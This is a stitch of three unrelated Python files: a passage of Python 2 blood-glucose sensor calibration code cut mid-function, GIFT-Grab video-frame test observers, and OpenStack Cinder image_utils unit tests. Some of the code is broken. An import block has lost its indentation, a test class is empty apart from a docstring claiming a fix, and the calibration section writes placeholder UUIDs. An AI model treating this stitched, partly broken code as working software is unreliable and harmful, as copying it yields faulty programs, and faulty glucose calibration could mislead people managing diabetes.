        # Map the higher entered bg onto the reading with the higher raw value.
        if BgReading1.raw_value > BgReading2.raw_value:
                highBgReading=BGReadings_Data()
                highBgReading.getlatest()
                lowBgReading=BGReadings_Data()
                lowBgReading.getsecondlatest()
        else:
                highBgReading=BGReadings_Data()
                highBgReading.getsecondlatest()
                lowBgReading=BGReadings_Data()
                lowBgReading.getlatest()
        print "highBgReading.raw_value -> " + str(highBgReading.raw_value)
        print "lowBgReading.raw_value -> " + str(lowBgReading.raw_value)
        # Initial identity calibration: slope 1, intercept = entered bg.
        higherCalibration.bg = higher_bg
        higherCalibration.slope = 1
        higherCalibration.intercept = higher_bg
        print "cal high intercept " + str(higherCalibration.intercept)
        print "cal high adjraw " + str(highBgReading.age_adjusted_raw_value)
        print "cal high higherbg " + str(higher_bg)
        higherCalibration.sensor = sens
        higherCalibration.estimate_raw_at_time_of_calibration = highBgReading.age_adjusted_raw_value
        higherCalibration.age_adjusted_raw_value = highBgReading.age_adjusted_raw_value
        higherCalibration.raw_value = highBgReading.raw_value
        higherCalibration.raw_timestamp = highBgReading.raw_timestamp
        higherCalibration.save()
        highBgReading.bg = higher_bg
        highBgReading.calibration_flag = True
        highBgReading.calibration = higherCalibration
        higherCalibration.save()
        lowerCalibration.bg = lower_bg
        lowerCalibration.slope = 1
        lowerCalibration.intercept = lower_bg
        print "cal low intercept " + str(lowerCalibration.intercept)
        print "cal low adjraw " + str(lowBgReading.age_adjusted_raw_value)
        print "cal low higherbg " + str(lower_bg)
        lowerCalibration.sensor = sens
        lowerCalibration.estimate_raw_at_time_of_calibration = lowBgReading.age_adjusted_raw_value
        lowerCalibration.age_adjusted_raw_value = lowBgReading.age_adjusted_raw_value
        lowerCalibration.raw_value = lowBgReading.raw_value
        lowerCalibration.raw_timestamp = lowBgReading.raw_timestamp
        lowBgReading.bg = lower_bg
        lowBgReading.calibration_flag = True
        lowBgReading.calibration = lowerCalibration
        lowerCalibration.save()
    # lowBgReading.timestamp=long(str(int(time.time()))+"000")
        # NOTE(review): calibration-style fields (slope_confidence,
        # sensor_confidence, ...) are written onto the BG reading objects
        # here -- confirm the readings schema really carries these columns.
        lowBgReading.sensor_uuid='Sensor_uuid'
        lowBgReading.slope_confidence = 0.5
        lowBgReading.distance_from_estimate = 0
        lowBgReading.check_in = False
        lowBgReading.sensor_confidence = ((-0.0018 * lowBgReading.bg * lowBgReading.bg) + (0.6657 * lowBgReading.bg) + 36.7505) / 100;
        lowBgReading.sensor_age_at_time_of_estimation = lowBgReading.timestamp - sens['started_at']
        lowBgReading.uuid = 'randomUUID'
        lowBgReading.write2db()
    # highBgReading.timestamp=long(str(int(time.time()))+"000")
        highBgReading.sensor_uuid='Sensor_uuid'
        highBgReading.slope_confidence = 0.5
        highBgReading.distance_from_estimate = 0
        highBgReading.check_in = False
        highBgReading.sensor_confidence = ((-0.0018 * highBgReading.bg * highBgReading.bg) + (0.6657 * highBgReading.bg) + 36.7505) / 100;
        highBgReading.sensor_age_at_time_of_estimation = highBgReading.timestamp - sens['started_at']
        highBgReading.uuid = 'randomUUID'
        highBgReading.write2db()
        # Re-fit the filtered and raw value curves over the recent readings.
        find_new_curve()
        find_new_raw_curve()
        #highBgReading.find_new_raw_curve();
        #lowBgReading.find_new_curve();
        #lowBgReading.find_new_raw_curve();
        # Millisecond epoch timestamps (seconds + "000").
        lowerCalibration.timestamp = long(str(int(time.time()))+"000")
        lowerCalibration.sensor_uuid = sens['uuid']
        lowerCalibration.slope_confidence = 0.5
        lowerCalibration.distance_from_estimate = 0
        lowerCalibration.check_in = False
        lowerCalibration.sensor_confidence = ((-0.0018 * lowerCalibration.bg * lowerCalibration.bg) + (0.6657 * lowerCalibration.bg) + 36.7505) / 100
        lowerCalibration.sensor_age_at_time_of_estimation = lowerCalibration.timestamp - sens['started_at']
        lowerCalibration.uuid = "CALIBRATION UUID"
    # lowerCalibration.calculate_w_l_s()
        lowerCalibration.save()
        higherCalibration.timestamp = long(str(int(time.time()))+"000")
        higherCalibration.sensor_uuid = sens['uuid']
        higherCalibration.slope_confidence = 0.5
        higherCalibration.distance_from_estimate = 0
        higherCalibration.check_in = False
        higherCalibration.sensor_confidence = ((-0.0018 * higherCalibration.bg * higherCalibration.bg) + (0.6657 * higherCalibration.bg) + 36.7505) / 100
        higherCalibration.sensor_age_at_time_of_estimation = higherCalibration.timestamp - sens['started_at']
        higherCalibration.uuid = "CALIBRATION UUID"
        higherCalibration.save()
        # Fit the weighted least squares calibration over both records.
        calculate_w_l_s()
        # TODO(review): worth porting (was: "macht sinn umzusetzen").
        #adjustRecentBgReadings(5);
        #CalibrationRequest.createOffset(lowerCalibration.bg, 35);
        #context.startService(new Intent(context, Notifications.class));
def calculate_w_l_s_old():
        # Legacy hand-rolled weighted-least-squares fit of bg vs. raw
        # (superseded by calculate_w_l_s, which delegates to linregression).
        calibration=calibration_Data()
        calibration.getlatest()
        if calibration.sensorid<>0:
                # Running sums for the weighted normal equations:
                # l=sum(w), m=sum(w*x), n=sum(w*x^2), p=sum(w*y), q=sum(w*x*y).
                l = 0.0;
                m = 0.0;
                n = 0.0;
                p = 0.0;
                q = 0.0;
                w = 0.0
                calibrations = calibration.allForSensorInLastFourDays() # 5 days was a bit much, dropped this to 4
                # NOTE(review): this branch should normally be unreachable --
                # the initial calibration already creates two records (was a
                # German comment noting the same).
                if (len(calibrations) == 1):
                        calibration.slope = 1;
                        calibration.intercept = calibration.bg - (calibration.raw_value * calibration.slope);
                else:
                        for c in calibrations:
                                # Row layout -- TODO confirm against schema:
                                # c[2]=sensor age, c[4]=bg, c[8]=sensor
                                # confidence, c[9]=slope confidence,
                                # c[14]=raw value (millis-scaled).
                                sensor_age_at_time_of_estimation=c[2]
                                bg=c[4]
                                sensor_confidence=c[8]
                                slope_confidence=c[9]
                                estimate_raw_at_time_of_calibration=c[14]/1000
                                print "(calculate_w_l_s)(loop) sensor_age_at_time_of_estimation " + str(sensor_age_at_time_of_estimation)
                                print "(calculate_w_l_s)(loop) sensor_confidence " + str(sensor_confidence)
                                print "(calculate_w_l_s)(loop) slope_confidence " + str(slope_confidence)
                                print "(calculate_w_l_s)(loop) bg " + str(bg)
                                print "(calculate_w_l_s)(loop) estimate_raw_at_time_of_calibration " + str(estimate_raw_at_time_of_calibration)
                                w = calculateWeight(sensor_age_at_time_of_estimation,slope_confidence,sensor_confidence);
                                l += (w);
                                m += (w * estimate_raw_at_time_of_calibration);
                                q += (w * estimate_raw_at_time_of_calibration * bg);
                                n += (w * estimate_raw_at_time_of_calibration * estimate_raw_at_time_of_calibration);
                                p += (w * bg);
                        last_calibration = calibration_Data()
                        last_calibration.getlatest()
                        #w = ( calculateWeight(last_calibration.sensor_age_at_time_of_estimation,last_calibration.slope_confidence,last_calibration.sensor_confidence) * (len(c) * 0.14));
                        # The latest calibration is accumulated a second time,
                        # giving it extra weight in the fit.
                        w = ( calculateWeight(last_calibration.sensor_age_at_time_of_estimation,last_calibration.slope_confidence,last_calibration.sensor_confidence));
                        l += (w);
                        m += (w * last_calibration.estimate_raw_at_time_of_calibration/1000);
                        n += (w * (last_calibration.estimate_raw_at_time_of_calibration/1000) * (last_calibration.estimate_raw_at_time_of_calibration/1000));
                        p += (w * last_calibration.bg);
                        q += (w * (last_calibration.estimate_raw_at_time_of_calibration/1000) * last_calibration.bg);
                        print "(calculate_w_l_s)(loop) last_calibration.bg " + str(last_calibration.bg)
                        print "(calculate_w_l_s)(loop) .last_calibrationestimate_raw_at_time_of_calibration " + str(last_calibration.estimate_raw_at_time_of_calibration/1000)
                # Solve the 2x2 normal equations; d is the determinant.
                d = ((l * n) - (m * m));
                print "w ->" + str(w)
                print "l ->" + str(l)
                print "n ->" + str(n)
                print "p ->" + str(p)
                print "m ->" + str(m)
                print "q ->" + str(q)
                print "d ->" + str(d)
                print "n*p" + str(n*p)
                print "m*q" + str(m*q)
                calibration.intercept = ((n * p) - (m * q)) / d;
                calibration.slope = ((l * q) - (m * p)) / d;
                print "(1) Calculated Calibration Slope: " + str(calibration.slope)
                print "(1) Calculated Calibration intercept: " + str(calibration.intercept)
                # Clamp out-of-bounds slopes (was a German TODO calling this
                # one of the most interesting parts of the algorithm).
                if 1==1:
                        if ((len(calibrations) == 2 and calibration.slope < 0.95) or (calibration.slope < 0.85)):
                                # I have not seen a case where a value below 7.5 proved to be accurate but we should keep an eye on this
                                calibration.slope = slopeOOBHandler(0);
                                if(len(calibrations) > 2):
                                        calibration.possible_bad = True
                                print "calibration.bg-> " + str(calibration.bg)
                                print "calibration.estimate_raw_at_time_of_calibration -> " + str(calibration.estimate_raw_at_time_of_calibration)
                                print "calibration.slope -> " + str(calibration.slope)
                                calibration.intercept = calibration.bg - ((calibration.estimate_raw_at_time_of_calibration*1.0/1000) * calibration.slope)
                                # CalibrationRequest.createOffset(calibration.bg, 25);
                        if ((len(calibrations) == 2 and calibration.slope > 1.3) or (calibration.slope > 1.4)):
                                calibration.slope = slopeOOBHandler(1);
                                if(len(calibrations) > 2):
                                        calibration.possible_bad = True
                                print "(calibration.bg) ->" + str(calibration.bg)
                                # NOTE(review): estimate_raw_at_time_of_calibration
                                # has been observed to be zero here (was: "Hier
                                # ist eine Null drin !!!!").
                                print "(calibration.estimate_raw_at_time_of_calibration) ->" + str(calibration.estimate_raw_at_time_of_calibration)
                                print "(calibration.slope) ->" + str(calibration.slope)
                                calibration.intercept = calibration.bg - ((calibration.estimate_raw_at_time_of_calibration*1.0/1000) * calibration.slope)
                                # CalibrationRequest.createOffset(calibration.bg, 25);
                print "(2) Calculated Calibration Slope: " + str(calibration.slope)
                print "(2) Calculated Calibration intercept: " + str(calibration.intercept)
                calibration.save();
        else:
                print "NO Current active sensor found!!"
# ---------------------------------------------------------------------------
# (file concatenation boundary)
# ---------------------------------------------------------------------------
import time
import datetime
import pygiftgrab as pgg
use_numpy = True
try:
import numpy as np
except ImportError:
use_numpy = False
class StereoFrameBackwardsCompatibilityChecker(pgg.IObserver):
    """GIFT-Grab observer that checks backwards compatibility.

    Listens to an `Observable` and records, per received frame, whether
    the default (no-argument) data accessors agree with the explicit
    stereo-index-0 accessors, i.e. whether legacy mono clients of the
    NumPy data interface keep working.
    """
    def __init__(self):
        super(StereoFrameBackwardsCompatibilityChecker, self).__init__()
        self.obtained_backwards_compatible_frames = []
    def update(self, frame):
        # Compatible when frame.data() equals the stereo-index-0 data,
        # both structured-off and explicitly indexed, and lengths agree.
        checks = [
            np.array_equal(frame.data(), frame.data(False)),
            np.array_equal(frame.data(), frame.data(False, 0)),
            frame.data_length() == frame.data_length(0),
        ]
        self.obtained_backwards_compatible_frames.append(all(checks))
    def __bool__(self):
        # True only if at least one frame was seen and all were compatible.
        flags = self.obtained_backwards_compatible_frames
        return bool(flags) and all(flags)
class StereoFrameNumpyCompatibilityChecker(pgg.IObserver):
    """Descendant of GIFT-Grab's `Observer`, which will
    listen to `Observable`s for some time and when asked,
    will report whether the video source has been sending
    stereo frames that are compatible with the GIFT-Grab
    NumPy data interface.
    """
    def __init__(self, colour):
        super(StereoFrameNumpyCompatibilityChecker, self).__init__()
        # One bool per received frame.
        self.obtained_numpy_compatible_stereo_frames = []
        # currently structured NumPy arrays are supported
        # only for BGRA frames
        self.structured_flags = [colour == pgg.ColourSpace.BGRA]
        if self.structured_flags[-1]:
            # For BGRA also exercise the flat (unstructured) accessor.
            self.structured_flags.append(False)
    def update(self, frame):
        # Assume compatible until a check below fails.
        self.obtained_numpy_compatible_stereo_frames.append(True)
        if frame.stereo_count() <= 1:
            self.obtained_numpy_compatible_stereo_frames[-1] = False
            return
        frames_numpy_compatible = True
        for structured_flag in self.structured_flags:
            # The no-index accessor must match stereo index 0.
            frames_numpy_compatible &= np.array_equal(frame.data(structured_flag), frame.data(structured_flag, 0))
            if not frames_numpy_compatible:
                self.obtained_numpy_compatible_stereo_frames[-1] = False
                return
            for index in range(frame.stereo_count()):
                data_np = frame.data(structured_flag, index)
                # Byte-typed data whose reported length matches the array.
                frames_numpy_compatible &= data_np.dtype == np.uint8
                data_len = frame.data_length(index)
                frames_numpy_compatible &= data_len == data_np.size
                if structured_flag:
                    # Structured arrays are laid out rows x cols (x channels).
                    frames_numpy_compatible &= data_np.shape[:2] == (frame.rows(), frame.cols())
                else:
                    # Flat arrays must not be indexable past their length.
                    try:
                        data_np[data_len]
                    except IndexError:
                        pass
                    else:
                        frames_numpy_compatible = False
                if not frames_numpy_compatible:
                    self.obtained_numpy_compatible_stereo_frames[-1] = False
                    return
        self.obtained_numpy_compatible_stereo_frames[-1] = frames_numpy_compatible
    def __bool__(self):
        # True only if at least one frame was seen and all were compatible.
        if not self.obtained_numpy_compatible_stereo_frames:
            return False
        for numpy_compatibility in self.obtained_numpy_compatible_stereo_frames:
            if not numpy_compatibility:
                return False
        return True
class StereoFrameConsistencyChecker(pgg.IObserver):
    """GIFT-Grab observer that checks stereo frames for consistency.

    Each received frame must carry at least two stereo images whose
    data buffers are non-empty, identically shaped, and pairwise
    different from their successor.
    """
    def __init__(self):
        super(StereoFrameConsistencyChecker, self).__init__()
        self.obtained_consistent_stereo_frames = []
    def update(self, frame):
        count = frame.stereo_count()
        if count <= 1:
            # Not a stereo frame at all.
            self.obtained_consistent_stereo_frames.append(False)
            return
        consistent = True
        for idx in range(count - 1):
            current = frame.data(False, idx)
            following = frame.data(False, idx + 1)
            # Empty buffer, shape mismatch, or identical neighbouring
            # images all count as inconsistent.
            if (current.size == 0
                    or current.shape != following.shape
                    or np.array_equal(current, following)):
                consistent = False
                break
        self.obtained_consistent_stereo_frames.append(consistent)
    def __bool__(self):
        # True only if at least one frame was seen and all were consistent.
        flags = self.obtained_consistent_stereo_frames
        return bool(flags) and all(flags)
class FrameRateTimer(pgg.IObserver):
    """Descendant of GIFT-Grab's `Observer`, which
    will listen to `Observable`s for some time and
    when asked, will report whether data has been
    sent at the specified frame rate.
    """
    def __init__(self, frame_rate, init_time = 0):
        super(FrameRateTimer, self).__init__()
        self._frame_rate = frame_rate
        # all data for this initial period (in sec) will be discarded
        self._init_time = init_time
        # Timestamps are stored as NumPy datetime64[us] when NumPy is
        # available, otherwise as plain datetime objects.
        if use_numpy:
            self._timestamps = np.array([], dtype='datetime64[us]')
        else:
            self._timestamps = []
    def update(self, frame):
        # Record the arrival time of each frame; the frame itself is ignored.
        if use_numpy:
            self._timestamps = np.append(self._timestamps,
                                         np.datetime64(datetime.datetime.now()))
        else:
            self._timestamps.append(datetime.datetime.now())
    def __bool__(self):
        """Check if updates have been in time intervals
        in line with defined frame rate, also resetting
        all saved timestamps, i.e. ready for next round.
        """
        # NOTE(review): despite the docstring, the saved timestamps are NOT
        # reset here -- confirm whether callers rely on a reset.
        global use_numpy
        # Discard the warm-up period's worth of samples.
        n_init_items = int(self._init_time * self._frame_rate)
        if use_numpy:
            if n_init_items >= self._timestamps.size:
                raise IndexError('Not enough data collected')
        else:
            if n_init_items >= len(self._timestamps):
                raise IndexError('Not enough data collected')
        timestamps = self._timestamps[n_init_items:]
        if use_numpy:
            # Cumulative frame rate from the first kept timestamp to each
            # later one; every cumulative rate must meet the target.
            intervals = timestamps[1:] - timestamps[0]
            frame_rates = np.array(
                [(i + 1) / (interval / np.timedelta64(1, 's'))
                 for i, interval in enumerate(intervals)]
            )
            return np.min(frame_rates) >= self._frame_rate
        else:
            intervals = [
                (timestamp - timestamps[0]).total_seconds()
                for timestamp in timestamps[1:]
            ]
            frame_rates = [(i + 1) / interval for i, interval in enumerate(intervals)]
            return min(frame_rates) >= self._frame_rate
    def __nonzero__(self):
        # Python 2 truthiness hook; delegates to __bool__.
        if self.__bool__():
            return 1
        else:
            return 0
class VideoFrameDesc:
    """Lightweight record of a video frame's specs.

    Captures the column/row counts, colour space and data length of the
    frame passed at construction time, without copying its pixel data.
    """
    def __init__(self, frame):
        # Snapshot the specs only; the frame's data buffer is never touched.
        self.cols, self.rows = frame.cols(), frame.rows()
        self.colour, self.data_length = frame.colour(), frame.data_length()
class FileChecker(pgg.IObserver):
    """GIFT-Grab observer that validates a file reader's output.

    Collects a `VideoFrameDesc` for every frame the attached reader
    emits and offers boolean helpers about the observed colour space,
    frame rate, dimensions and buffer lengths.
    """
    def __init__(self, file_reader):
        super(FileChecker, self).__init__()
        self._file_reader = file_reader
        self._frame_descs = []
    def attach(self):
        # No-op when constructed without a reader.
        if self._file_reader is not None:
            self._file_reader.attach(self)
    def detach(self):
        if self._file_reader is not None:
            self._file_reader.detach(self)
    def update(self, frame):
        # Record the frame's specs only; its data is not kept.
        self._frame_descs.append(VideoFrameDesc(frame))
    def assert_data(self):
        # True once at least one frame has been observed.
        return len(self._frame_descs) > 0
    def assert_colour(self, colour):
        # Every observed frame must use the expected colour space.
        return all(desc.colour == colour for desc in self._frame_descs)
    def assert_frame_rate(self, frame_rate):
        # The reader itself reports its frame rate.
        return self._file_reader.get_frame_rate() == frame_rate
    def assert_frame_dimensions(self,
                                frame_width, frame_height):
        return all(
            desc.cols == frame_width and desc.rows == frame_height
            for desc in self._frame_descs
        )
    def assert_frame_data_lengths(self, colour,
                                  frame_width, frame_height):
        # Compare against GIFT-Grab's canonical buffer size for these specs.
        exp_data_length = pgg.VideoFrame.required_data_length(
            colour, frame_width, frame_height
        )
        return all(
            desc.data_length == exp_data_length
            for desc in self._frame_descs
        )
# ---------------------------------------------------------------------------
# (file concatenation boundary)
# ---------------------------------------------------------------------------
# Copyright (c) 2013 eNovance , Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Unit tests for image utils."""
import math
import mock
from oslo_concurrency import processutils
from oslo_utils import units
from cinder import exception
from cinder.image import image_utils
from cinder import test
from cinder.volume import throttling
class TestQemuImgInfo(test.TestCase):
    """Unit tests for image_utils.qemu_img_info and the qemu-img version
    helpers.  Note: mock.patch decorators inject mocks bottom-up, so the
    innermost (last) decorator maps to the first mock parameter.
    """
    @mock.patch('cinder.openstack.common.imageutils.QemuImgInfo')
    @mock.patch('cinder.utils.execute')
    def test_qemu_img_info(self, mock_exec, mock_info):
        # Default invocation runs qemu-img as root under a C locale.
        mock_out = mock.sentinel.out
        mock_err = mock.sentinel.err
        test_path = mock.sentinel.path
        mock_exec.return_value = (mock_out, mock_err)
        output = image_utils.qemu_img_info(test_path)
        mock_exec.assert_called_once_with('env', 'LC_ALL=C', 'qemu-img',
                                          'info', test_path, run_as_root=True)
        self.assertEqual(mock_info.return_value, output)
    @mock.patch('cinder.openstack.common.imageutils.QemuImgInfo')
    @mock.patch('cinder.utils.execute')
    def test_qemu_img_info_not_root(self, mock_exec, mock_info):
        # run_as_root=False must be forwarded to the execute call.
        mock_out = mock.sentinel.out
        mock_err = mock.sentinel.err
        test_path = mock.sentinel.path
        mock_exec.return_value = (mock_out, mock_err)
        output = image_utils.qemu_img_info(test_path, run_as_root=False)
        mock_exec.assert_called_once_with('env', 'LC_ALL=C', 'qemu-img',
                                          'info', test_path, run_as_root=False)
        self.assertEqual(mock_info.return_value, output)
    @mock.patch('cinder.image.image_utils.os')
    @mock.patch('cinder.openstack.common.imageutils.QemuImgInfo')
    @mock.patch('cinder.utils.execute')
    def test_qemu_img_info_on_nt(self, mock_exec, mock_info, mock_os):
        # On Windows ('nt') the env/LC_ALL prefix is dropped.
        mock_out = mock.sentinel.out
        mock_err = mock.sentinel.err
        test_path = mock.sentinel.path
        mock_exec.return_value = (mock_out, mock_err)
        mock_os.name = 'nt'
        output = image_utils.qemu_img_info(test_path)
        mock_exec.assert_called_once_with('qemu-img', 'info', test_path,
                                          run_as_root=True)
        self.assertEqual(mock_info.return_value, output)
    @mock.patch('cinder.utils.execute')
    def test_get_qemu_img_version(self, mock_exec):
        # Version is parsed out of the '--help' banner text.
        mock_out = "qemu-img version 2.0.0"
        mock_err = mock.sentinel.err
        mock_exec.return_value = (mock_out, mock_err)
        expected_version = [2, 0, 0]
        version = image_utils.get_qemu_img_version()
        mock_exec.assert_called_once_with('qemu-img', '--help',
                                          check_exit_code=False)
        self.assertEqual(expected_version, version)
    @mock.patch.object(image_utils, 'get_qemu_img_version')
    def test_validate_qemu_img_version(self, mock_get_qemu_img_version):
        # Equal-to-minimum version passes without raising.
        fake_current_version = [1, 8]
        mock_get_qemu_img_version.return_value = fake_current_version
        minimum_version = '1.8'
        image_utils.check_qemu_img_version(minimum_version)
        mock_get_qemu_img_version.assert_called_once_with()
    @mock.patch.object(image_utils, 'get_qemu_img_version')
    def _test_validate_unsupported_qemu_img_version(self,
                                                    mock_get_qemu_img_version,
                                                    current_version=None):
        # Shared helper: versions below the 2.0 minimum (or a missing
        # qemu-img, current_version=None) must raise.
        mock_get_qemu_img_version.return_value = current_version
        minimum_version = '2.0'
        self.assertRaises(exception.VolumeBackendAPIException,
                          image_utils.check_qemu_img_version,
                          minimum_version)
        mock_get_qemu_img_version.assert_called_once_with()
    def test_validate_qemu_img_version_not_installed(self):
        self._test_validate_unsupported_qemu_img_version()
    def test_validate_older_qemu_img_version(self):
        self._test_validate_unsupported_qemu_img_version(
            current_version=[1, 8])
class TestConvertImage(test.TestCase):
    """Unit tests for image_utils.convert_image (qemu-img convert)."""
    @mock.patch('cinder.image.image_utils.os.stat')
    @mock.patch('cinder.utils.execute')
    @mock.patch('cinder.utils.is_blk_device', return_value=True)
    def test_defaults_block_dev(self, mock_isblk, mock_exec,
                                mock_stat):
        # Converting onto a block device: with O_DIRECT support the
        # throttle prefix and '-t none' cache mode are used; without it
        # the plain command is issued.
        source = mock.sentinel.source
        dest = mock.sentinel.dest
        out_format = mock.sentinel.out_format
        mock_stat.return_value.st_size = 1048576
        throttle = throttling.Throttle(prefix=['cgcmd'])
        with mock.patch('cinder.volume.utils.check_for_odirect_support',
                        return_value=True):
            output = image_utils.convert_image(source, dest, out_format,
                                               throttle=throttle)
            self.assertIsNone(output)
            mock_exec.assert_called_once_with('cgcmd', 'qemu-img', 'convert',
                                              '-t', 'none', '-O', out_format,
                                              source, dest, run_as_root=True)
        mock_exec.reset_mock()
        with mock.patch('cinder.volume.utils.check_for_odirect_support',
                        return_value=False):
            output = image_utils.convert_image(source, dest, out_format)
            self.assertIsNone(output)
            mock_exec.assert_called_once_with('qemu-img', 'convert',
                                              '-O', out_format, source, dest,
                                              run_as_root=True)
    @mock.patch('cinder.volume.utils.check_for_odirect_support',
                return_value=True)
    @mock.patch('cinder.image.image_utils.os.stat')
    @mock.patch('cinder.utils.execute')
    @mock.patch('cinder.utils.is_blk_device', return_value=False)
    def test_defaults_not_block_dev(self, mock_isblk, mock_exec,
                                    mock_stat, mock_odirect):
        # A regular-file destination never gets the '-t none' cache flag,
        # even when O_DIRECT is supported.
        source = mock.sentinel.source
        dest = mock.sentinel.dest
        out_format = mock.sentinel.out_format
        mock_stat.return_value.st_size = 1048576
        output = image_utils.convert_image(source, dest, out_format)
        self.assertIsNone(output)
        mock_exec.assert_called_once_with('qemu-img', 'convert', '-O',
                                          out_format, source, dest,
                                          run_as_root=True)
class TestResizeImage(test.TestCase):
    """Unit tests for image_utils.resize_image (qemu-img resize)."""
    @mock.patch('cinder.utils.execute')
    def test_defaults(self, mock_exec):
        # By default the resize runs unprivileged; the size is passed in
        # gigabytes ('<size>G').
        source = mock.sentinel.source
        size = mock.sentinel.size
        output = image_utils.resize_image(source, size)
        self.assertIsNone(output)
        mock_exec.assert_called_once_with('qemu-img', 'resize', source,
                                          'sentinel.sizeG', run_as_root=False)
    @mock.patch('cinder.utils.execute')
    def test_run_as_root(self, mock_exec):
        # run_as_root=True is forwarded to the execute call.
        source = mock.sentinel.source
        size = mock.sentinel.size
        output = image_utils.resize_image(source, size, run_as_root=True)
        self.assertIsNone(output)
        mock_exec.assert_called_once_with('qemu-img', 'resize', source,
                                          'sentinel.sizeG', run_as_root=True)
class TestFetch(test.TestCase):
    """Unit tests for image_utils.fetch (image download to a local path)."""
    @mock.patch('os.stat')
    @mock.patch('cinder.image.image_utils.fileutils')
    def test_defaults(self, mock_fileutils, mock_stat):
        # fetch() must download into the opened destination file and wrap
        # the work in fileutils.remove_path_on_error.
        ctxt = mock.sentinel.context
        image_service = mock.Mock()
        image_id = mock.sentinel.image_id
        path = 'test_path'
        _user_id = mock.sentinel._user_id
        _project_id = mock.sentinel._project_id
        mock_open = mock.mock_open()
        mock_stat.return_value.st_size = 1048576
        # Patch the built-in open used inside image_utils (create=True
        # because the module does not define its own 'open').
        with mock.patch('cinder.image.image_utils.open',
                        new=mock_open, create=True):
            output = image_utils.fetch(ctxt, image_service, image_id, path,
                                       _user_id, _project_id)
        self.assertIsNone(output)
        image_service.download.assert_called_once_with(ctxt, image_id,
                                                       mock_open.return_value)
        mock_open.assert_called_once_with(path, 'wb')
        # The error-cleanup context manager must be entered and exited.
        mock_fileutils.remove_path_on_error.assert_called_once_with(path)
        (mock_fileutils.remove_path_on_error.return_value.__enter__
            .assert_called_once_with())
        (mock_fileutils.remove_path_on_error.return_value.__exit__
            .assert_called_once_with(None, None, None))
class TestVerifyImage(test.TestCase):
    """Tests for image_utils.fetch_verify_image validation logic."""

    @mock.patch('cinder.image.image_utils.qemu_img_info')
    @mock.patch('cinder.image.image_utils.fileutils')
    @mock.patch('cinder.image.image_utils.fetch')
    def test_defaults(self, mock_fetch, mock_fileutils, mock_info):
        """A well-formed image is fetched and passes verification."""
        ctxt = mock.sentinel.context
        image_service = mock.Mock()
        image_id = mock.sentinel.image_id
        dest = mock.sentinel.dest
        mock_data = mock_info.return_value
        # A recognized format with no backing file is acceptable.
        mock_data.file_format = 'test_format'
        mock_data.backing_file = None
        output = image_utils.fetch_verify_image(ctxt, image_service,
                                                image_id, dest)
        self.assertIsNone(output)
        mock_fetch.assert_called_once_with(ctxt, image_service, image_id,
                                           dest, None, None)
        mock_info.assert_called_once_with(dest, run_as_root=True)
        mock_fileutils.remove_path_on_error.assert_called_once_with(dest)
        (mock_fileutils.remove_path_on_error.return_value.__enter__
            .assert_called_once_with())
        (mock_fileutils.remove_path_on_error.return_value.__exit__
            .assert_called_once_with(None, None, None))

    @mock.patch('cinder.image.image_utils.qemu_img_info')
    @mock.patch('cinder.image.image_utils.fileutils')
    @mock.patch('cinder.image.image_utils.fetch')
    def test_kwargs(self, mock_fetch, mock_fileutils, mock_info):
        """Optional kwargs are honored; the size check passes when it fits."""
        ctxt = mock.sentinel.context
        image_service = mock.Mock()
        image_id = mock.sentinel.image_id
        dest = mock.sentinel.dest
        user_id = mock.sentinel.user_id
        project_id = mock.sentinel.project_id
        size = 2
        run_as_root = mock.sentinel.run_as_root
        mock_data = mock_info.return_value
        mock_data.file_format = 'test_format'
        mock_data.backing_file = None
        # virtual_size (1) is within the requested size (2), so no error.
        mock_data.virtual_size = 1
        output = image_utils.fetch_verify_image(
            ctxt, image_service, image_id, dest, user_id=user_id,
            project_id=project_id, size=size, run_as_root=run_as_root)
        self.assertIsNone(output)
        # NOTE(review): fetch_verify_image does not forward
        # user_id/project_id to fetch(); it always passes None, None.
        mock_fetch.assert_called_once_with(ctxt, image_service, image_id,
                                           dest, None, None)
        mock_info.assert_called_once_with(dest, run_as_root=run_as_root)
        mock_fileutils.remove_path_on_error.assert_called_once_with(dest)
        (mock_fileutils.remove_path_on_error.return_value.__enter__
            .assert_called_once_with())
        (mock_fileutils.remove_path_on_error.return_value.__exit__
            .assert_called_once_with(None, None, None))

    @mock.patch('cinder.image.image_utils.qemu_img_info')
    @mock.patch('cinder.image.image_utils.fileutils')
    @mock.patch('cinder.image.image_utils.fetch')
    def test_format_error(self, mock_fetch, mock_fileutils, mock_info):
        """An image with no identifiable format is rejected."""
        ctxt = mock.sentinel.context
        image_service = mock.Mock()
        image_id = mock.sentinel.image_id
        dest = mock.sentinel.dest
        mock_data = mock_info.return_value
        mock_data.file_format = None
        mock_data.backing_file = None
        self.assertRaises(exception.ImageUnacceptable,
                          image_utils.fetch_verify_image,
                          ctxt, image_service, image_id, dest)

    @mock.patch('cinder.image.image_utils.qemu_img_info')
    @mock.patch('cinder.image.image_utils.fileutils')
    @mock.patch('cinder.image.image_utils.fetch')
    def test_backing_file_error(self, mock_fetch, mock_fileutils, mock_info):
        """An image that references a backing file is rejected."""
        ctxt = mock.sentinel.context
        image_service = mock.Mock()
        image_id = mock.sentinel.image_id
        dest = mock.sentinel.dest
        mock_data = mock_info.return_value
        mock_data.file_format = 'test_format'
        mock_data.backing_file = 'test_backing_file'
        self.assertRaises(exception.ImageUnacceptable,
                          image_utils.fetch_verify_image,
                          ctxt, image_service, image_id, dest)

    @mock.patch('cinder.image.image_utils.qemu_img_info')
    @mock.patch('cinder.image.image_utils.fileutils')
    @mock.patch('cinder.image.image_utils.fetch')
    def test_size_error(self, mock_fetch, mock_fileutils, mock_info):
        """An image larger than the requested size is rejected."""
        ctxt = mock.sentinel.context
        image_service = mock.Mock()
        image_id = mock.sentinel.image_id
        dest = mock.sentinel.dest
        size = 1
        mock_data = mock_info.return_value
        mock_data.file_format = 'test_format'
        mock_data.backing_file = None
        # virtual_size (2) exceeds the requested size (1).
        mock_data.virtual_size = 2
        self.assertRaises(exception.ImageUnacceptable,
                          image_utils.fetch_verify_image,
                          ctxt, image_service, image_id, dest, size=size)
class TestTemporaryDir(test.TestCase):
    """Tests for image_utils.temporary_dir conversion-directory handling.

    Fix: the assertEqual calls previously passed (actual, expected);
    they now use the (expected, actual) order used elsewhere in this
    file so failure messages label the values correctly.
    """

